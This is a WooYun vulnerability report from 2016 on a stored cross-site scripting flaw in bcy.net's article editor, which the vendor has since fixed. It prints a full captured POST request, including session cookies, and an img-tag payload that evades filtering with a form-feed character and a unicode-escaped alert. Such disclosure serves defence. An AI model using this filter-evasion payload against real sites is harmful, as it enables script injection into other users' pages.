当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186397

漏洞标题:半次元主站存储型xss漏洞

相关厂商:bcy.net

漏洞作者: 赵健康

提交时间:2016-03-18 22:52

修复时间:2016-03-19 20:03

公开时间:2016-03-19 20:03

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-19: 厂商已经确认,细节仅向厂商公开
2016-03-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

找呀找呀找朋友

详细说明:

首先添加文章
http://bcy.net/article/new
内容添加个美女图片
抓包

POST /article/donewpost HTTP/1.1
Host: bcy.net
Content-Length: 202
Accept: */*
Origin: http://bcy.net
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://bcy.net/article/new
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: lang_set=zh; PHPSESSID=qf5sta6a97ld8eupu0j503ocs6; LOGGED_USER=mPWLvxD3DsTD3jms5GTfYos%3D%3AtVWDM09O2Chzh3P7x4d5aQ%3D%3D; Hm_lvt_330d168f9714e3aa16c5661e62c00232=1458288564,1458307083; Hm_lpvt_330d168f9714e3aa16c5661e62c00232=1458307972; CNZZDATA1257708097=1929957071-1458288294-http%253A%252F%252Fwww.so.com%252F%7C1458304927; mobile_set=no
Connection: close
title=aaaa%3Cimg%3E&category0=1&category1=3&category=1-3&content=%3Cimg+src%3Dhttp%3A%2F%2Fimg9.bcyimg.com%2Farticle%2Fpost%2F177su%2F5e7311c0ed0f11e5b78bf1de8df5b015.png?%0conload=\u0061lert(1)//%22%3E


主要是content%3Cimg+src%3Dhttp%3A%2F%2Fimg9.bcyimg.com%2Farticle%2Fpost%2F177su%2F5e7311c0ed0f11e5b78bf1de8df5b015.png?%0conload=\u0061lert(1)//%22%3E

漏洞证明:

3.png


文章我删除了
http://bcy.net/article/preview/7707

修复方案:

字符过滤哦

版权声明:转载请注明来源 赵健康@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-03-19 20:02

厂商回复:

非常感谢您对半次元信息安全的帮助。

最新状态:

2016-03-19:文章只有发布用户自己能看到,已加强验证 谢谢康康

2016-03-19: